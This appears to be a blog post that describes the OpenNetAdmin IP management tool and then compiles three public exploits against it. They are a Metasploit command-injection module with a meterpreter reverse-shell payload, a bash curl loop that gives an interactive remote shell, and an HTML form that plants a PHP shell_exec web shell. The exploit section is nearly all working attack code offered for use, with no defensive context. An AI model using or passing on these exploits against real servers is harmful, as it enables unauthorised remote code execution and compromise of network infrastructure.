OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work. We hope to provide a useful Network Management application for managing your IP subnets, hosts and much more. Stop using spreadsheets to manage your network! Start doing proper IP address management!.
Features of OpenNetAdmin
- Full CLI interface for batch and scripting
- Plugin system to extend functionality
- Audit managed subnets and discover new IPs
- Manage DNS and DHCP server configs, archive host configs
- And much more...
OpenNetAdmin Exploits Including Remote Code Execution
Recently there was a surge in opennetadmin exploit on google search, so I decided to compile some of the exploits for open net admin. When you perform a search on Nmmapper.com for OpenNetAdmin it yields three exploits for opennetadmin. Some of those include the following exploits
- OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)
- OpenNetAdmin 18.1.1 - Remote Code Execution
- OpenNetAdmin 13.03.01 - Remote Code Execution
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNetAdmin Ping Command Injection',
'Description' => %q{
This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
},
'Author' =>
[
'mattpascoe', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' =>
[
['EDB', '47691']
],
'DisclosureDate' => '2019-11-19',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultOptions' =>
{
'RPORT' => 80,
'payload' => 'linux/x86/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options(
[
OptString.new('VHOST', [false, 'HTTP server virtual host']),
OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
]
)
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'vars_post' => {
'xajax' => 'window_open',
'xajaxargs[]' => 'app_about'
}
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.body =~ /OpenNetAdmin/i
return CheckCode::Safe
end
opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
version = Gem::Version.new('opennetadmin_version')
if version
vprint_status "OpenNetAdmin version #{version}"
end
if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
return CheckCode::Appears
end
CheckCode::Detected
end
def exploit
print_status('Exploiting...')
execute_cmdstager(flavor: :printf)
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
end
def execute_command(cmd, opts = {})
post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
begin
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
OpenNetAdmin 18.1.1 - Remote Code Execution
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
OpenNetAdmin 13.03.01 - Remote Code Execution
<center>
<head>
<title>0wned Your Network</title>
<script type="text/javascript">
function changeaction()
{
document.sploit.action = document.getElementById("url").value;
alert('Remember, your shell must be accessed via
'+document.getElementById("url").value+'?module=mandat0ry');
}
</script>
</head>
<font size="5">OpenNetAdmin RCE Exploit</font><br />
<font size="2"><i>Now with leet button sploiting action! (oooh,
ahhh!)</i></font><br /><br />
<form action="/" method="post" name="sploit" onsubmit="changeaction()" >
URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
PHP Code to Execute: <input type="text" size="50" name="options[desc]"
value="<?php echo shell_exec($_GET[1]) ?>"/> <br />
<input type="hidden" name="module" value="add_module" />
<input type="hidden" name="options[name]" value="mandat0ry" />
<input type="hidden" name="options[file]"
value="../../../../../../../../../../../var/log/ona.log" />
<input type="submit" value="Exploit!" />
</form>
<b><i>Special thanks to: offsec, twitches, funkenstein, zachzor,
av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b>
</center>
When you try to search for this exploit you get much results of them. And it seems it's among the top searched exploits.